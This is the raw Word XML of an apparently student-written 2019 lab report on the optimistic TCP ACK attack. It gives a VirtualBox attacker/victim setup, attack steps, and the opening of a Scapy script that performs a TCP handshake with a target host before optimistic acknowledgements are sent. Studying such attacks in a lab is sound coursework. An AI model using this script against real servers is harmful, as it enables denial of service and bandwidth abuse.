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2D2AC3" w14:textId="77777777" w:rsidR="006300F9" w:rsidRPr="008C3347" w:rsidRDefault="006300F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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_z6ne0og04bp5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5CCE4CE3" w14:textId="77777777" w:rsidR="006300F9" w:rsidRPr="001D0995" w:rsidRDefault="006300F9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71687654" w14:textId="77777777" w:rsidR="006300F9" w:rsidRPr="00BA473C" w:rsidRDefault="00126272" w:rsidP="00BA473C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72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_2gazcsgmxkub" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00BA473C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>CSE-406</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F907ADD" w14:textId="77777777" w:rsidR="006300F9" w:rsidRPr="00BA473C" w:rsidRDefault="00126272" w:rsidP="00BA473C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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_z6rjws22jauf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00BA473C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Optimistic TCP Ack attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C63DFC" w14:textId="0E2AE26D" w:rsidR="006300F9" w:rsidRPr="00BA473C" w:rsidRDefault="00DA3ACD" w:rsidP="00BA473C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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_ng30guuqqp2v" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00E1714D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2C2C9C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidR="00126272" w:rsidRPr="00BA473C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444D43F" w14:textId="77777777" w:rsidR="006300F9" w:rsidRPr="00BA473C" w:rsidRDefault="00126272" w:rsidP="00BA473C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="1440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA473C">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>─</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8F5DB7" w14:textId="77777777" w:rsidR="00C15CDE" w:rsidRDefault="00C15CDE" w:rsidP="00BA47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T Sans Narrow" w:eastAsia="PT Sans Narrow" w:hAnsi="PT Sans Narrow" w:cs="PT Sans Narrow"/>
          <w:color w:val="E36C0A" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0AED75" w14:textId="77777777" w:rsidR="006300F9" w:rsidRPr="00BA473C" w:rsidRDefault="001D0995" w:rsidP="00BA47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T Sans Narrow" w:eastAsia="PT Sans Narrow" w:hAnsi="PT Sans Narrow" w:cs="PT Sans Narrow"/>
          <w:color w:val="E36C0A" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA473C">
        <w:rPr>
          <w:rFonts w:ascii="PT Sans Narrow" w:eastAsia="PT Sans Narrow" w:hAnsi="PT Sans Narrow" w:cs="PT Sans Narrow"/>
          <w:color w:val="E36C0A" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Montaser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA473C">
        <w:rPr>
          <w:rFonts w:ascii="PT Sans Narrow" w:eastAsia="PT Sans Narrow" w:hAnsi="PT Sans Narrow" w:cs="PT Sans Narrow"/>
          <w:color w:val="E36C0A" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Majid </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA473C">
        <w:rPr>
          <w:rFonts w:ascii="PT Sans Narrow" w:eastAsia="PT Sans Narrow" w:hAnsi="PT Sans Narrow" w:cs="PT Sans Narrow"/>
          <w:color w:val="E36C0A" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Taseen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="604448EA" w14:textId="77777777" w:rsidR="006300F9" w:rsidRPr="00BA473C" w:rsidRDefault="001D0995" w:rsidP="00BA473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 w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA473C">
        <w:rPr>
          <w:rFonts w:ascii="PT Sans Narrow" w:eastAsia="PT Sans Narrow" w:hAnsi="PT Sans Narrow" w:cs="PT Sans Narrow"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1505055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AE27AE" w14:textId="77777777" w:rsidR="006300F9" w:rsidRPr="00BA473C" w:rsidRDefault="001D0995" w:rsidP="00BA473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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA473C">
        <w:rPr>
          <w:rFonts w:ascii="PT Sans Narrow" w:eastAsia="PT Sans Narrow" w:hAnsi="PT Sans Narrow" w:cs="PT Sans Narrow"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Group - 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5234FC8D" w14:textId="77777777" w:rsidR="00BA473C" w:rsidRPr="00C15CDE" w:rsidRDefault="001D0995" w:rsidP="00C15CD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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA473C">
        <w:rPr>
          <w:rFonts w:ascii="PT Sans Narrow" w:eastAsia="PT Sans Narrow" w:hAnsi="PT Sans Narrow" w:cs="PT Sans Narrow"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Section - A</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_au51mny0sx6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="55C98BDB" w14:textId="77777777" w:rsidR="00BA473C" w:rsidRDefault="00BA473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</w:p>
    <w:p w14:paraId="30073A35" w14:textId="77777777" w:rsidR="00C15CDE" w:rsidRPr="00C15CDE" w:rsidRDefault="00C15CDE" w:rsidP="00C15CDE"/>
    <w:p w14:paraId="2050E171" w14:textId="77777777" w:rsidR="00BA473C" w:rsidRDefault="00BA473C" w:rsidP="00BA473C"/>
    <w:p w14:paraId="59E56BE3" w14:textId="77777777" w:rsidR="00BA473C" w:rsidRDefault="00BA473C" w:rsidP="00BA473C"/>
    <w:p w14:paraId="5168DA60" w14:textId="77777777" w:rsidR="00BA473C" w:rsidRDefault="00BA473C" w:rsidP="00BA473C"/>
    <w:p w14:paraId="3E8E78D4" w14:textId="77777777" w:rsidR="00BA473C" w:rsidRPr="00BA473C" w:rsidRDefault="00BA473C" w:rsidP="00BA473C"/>
    <w:p w14:paraId="7ABE42B1" w14:textId="77777777" w:rsidR="00DA3ACD" w:rsidRDefault="00DA3AC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</w:p>
    <w:p w14:paraId="70116CCB" w14:textId="77777777" w:rsidR="006300F9" w:rsidRPr="00DA3ACD" w:rsidRDefault="00DA3AC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rPr>
          <w:color w:val="E36C0A" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Steps of Attack</w:t>
      </w:r>
      <w:r w:rsidR="00126272" w:rsidRPr="00BA473C">
        <w:rPr>
          <w:color w:val="E36C0A" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00126272">
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00126272">
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00126272">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6787A88C" w14:textId="77777777" w:rsidR="00777F86" w:rsidRDefault="00777F86" w:rsidP="000B7FBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A59E5FD" w14:textId="77777777" w:rsidR="00DA3ACD" w:rsidRDefault="00DA3ACD" w:rsidP="000B7FBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA3ACD">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D900AA" w14:textId="77777777" w:rsidR="00DA3ACD" w:rsidRPr="00AC2B37" w:rsidRDefault="00DA3ACD" w:rsidP="000B7FBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/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</w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.Operating system: Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FB46DC" w14:textId="77777777" w:rsidR="00DA3ACD" w:rsidRPr="00AC2B37" w:rsidRDefault="00DA3ACD" w:rsidP="000B7FBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Virtualbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32DA3C3E" w14:textId="77777777" w:rsidR="00DA3ACD" w:rsidRPr="00AC2B37" w:rsidRDefault="00DA3ACD" w:rsidP="000B7FBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7945D396" w14:textId="77777777" w:rsidR="00DA3ACD" w:rsidRDefault="00DA3ACD" w:rsidP="000B7FBE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D3231F" w14:textId="77777777" w:rsidR="00DA3ACD" w:rsidRPr="00777F86" w:rsidRDefault="00DA3ACD" w:rsidP="000B7FBE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777F86">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF71907" w14:textId="77777777" w:rsidR="00DA3ACD" w:rsidRPr="00AC2B37" w:rsidRDefault="00DA3ACD" w:rsidP="000B7FBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00502001" w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Create a virtual machine(attacker) which will attack the main operating system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E88074B" w14:textId="77777777" w:rsidR="00502001" w:rsidRPr="00AC2B37" w:rsidRDefault="00502001" w:rsidP="000B7FBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t>1.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Attacker :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.20.57.40 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238CBBDD" w14:textId="77777777" w:rsidR="006300F9" w:rsidRPr="00AC2B37" w:rsidRDefault="00502001" w:rsidP="00502001">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t>2.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Victim :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.20.57.57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690FCB2C" w14:textId="77777777" w:rsidR="006300F9" w:rsidRDefault="006300F9">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF2588A" w14:textId="77777777" w:rsidR="00B54D77" w:rsidRDefault="00B54D77">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753B5BC7" w14:textId="77777777" w:rsidR="00502001" w:rsidRPr="00777F86" w:rsidRDefault="00502001">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777F86">
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Topology diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013CE399" w14:textId="77777777" w:rsidR="00777F86" w:rsidRDefault="00502001" w:rsidP="00777F86">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="448E2593" wp14:editId="1C445398">
            <wp:extent cx="5133975" cy="102679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1344" w14:textId="77777777" w:rsidR="00777F86" w:rsidRDefault="00777F86" w:rsidP="00777F86">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0993D167" w14:textId="77777777" w:rsidR="00B54D77" w:rsidRDefault="00B54D77" w:rsidP="00777F86">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D51627" w14:textId="77777777" w:rsidR="00777F86" w:rsidRDefault="009A69FC" w:rsidP="00777F86">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A69FC">
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Working steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BF9B11" w14:textId="77777777" w:rsidR="009A69FC" w:rsidRPr="00AC2B37" w:rsidRDefault="009A69FC" w:rsidP="00777F86">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">1. At first we will build a secure connection with the victim by implementing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CACA28B" w14:textId="77777777" w:rsidR="009A69FC" w:rsidRPr="00AC2B37" w:rsidRDefault="009A69FC" w:rsidP="00777F86">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2. From that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> handshake we will collect data about its payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E49C0B" w14:textId="77777777" w:rsidR="009A69FC" w:rsidRPr="00AC2B37" w:rsidRDefault="009A69FC" w:rsidP="009A69FC">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2B37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Now we will attack the server by sending acks for packets which it have not sent yet and force it to reply against those packets. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E431AE6" w14:textId="77777777" w:rsidR="00B54D77" w:rsidRPr="00AC2B37" w:rsidRDefault="00B54D77" w:rsidP="009A69FC">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F6BDFA4" w14:textId="77777777" w:rsidR="00B54D77" w:rsidRDefault="00B54D77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186F7A9C" w14:textId="77777777" w:rsidR="00B54D77" w:rsidRDefault="00B54D77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07BF7909" w14:textId="77777777" w:rsidR="00777F86" w:rsidRDefault="00777F86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 w:rsidRPr="00777F86">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Codes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224076AD" w14:textId="77777777" w:rsidR="00AB7B3C" w:rsidRDefault="00A3009D" w:rsidP="00B54D77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 xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5792F0E3" w14:textId="17B8A938" w:rsidR="00A3009D" w:rsidRPr="00B54D77" w:rsidRDefault="00A3009D" w:rsidP="00AB7B3C">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="360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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3009D">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>OptimisticAckAttacker.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B300B28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/>
        </w:rPr>
        <w:t>#!/usr/bin/env python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3D28DD71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import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argparse  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C3FEB5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import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time  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710F4A9B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from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scapy.all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import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*  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AE08E0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19978139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parser = argparse.ArgumentParser(description=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'Attack a TCP server with the optimistic ack attack.'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)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64452752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parser.add_argument(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'--host'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, default=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'127.0.0.1'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, type=str, help=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'The ip address to attack.'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)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0256CB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args = parser.parse_args()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C89A11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7ACB3C5D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if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__name__ == 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"__main__"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:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D7B2D8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host=args.host  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF4FA70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sequence_no=4444  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133858BB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source_port=6666  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B0C0B1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dest_port=12345  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDD406F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firsthandshake=IP(dst=host) / TCP(sport=source_port, dport=dest_port, flags=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'S'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,        seq=sequence_no)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FDBF28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print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"First handshake"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699B63C1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firsthandshake.show()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094ED77B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secondhandshake = sr1(firsthandshake)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AD4088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print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"Second handshake"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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019179C0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secondhandshake.show()    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F87425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thirdhandshake = IP(dst=host) / TCP(sport=source_port, dport=dest_port, flags=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'A'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,      ack=(secondhandshake.seq + 1), seq=(sequence_no + 1))  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8C8E88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print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"Third handshake"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4D44A33D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thirdhandshake.show()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D373EF7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lastdata=sr1(thirdhandshake)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B776179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print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"last data"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1DE32D56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lastdata.show()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4EEF92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024977C7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5784C88F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</w:t>
      </w:r>
    </w:p>
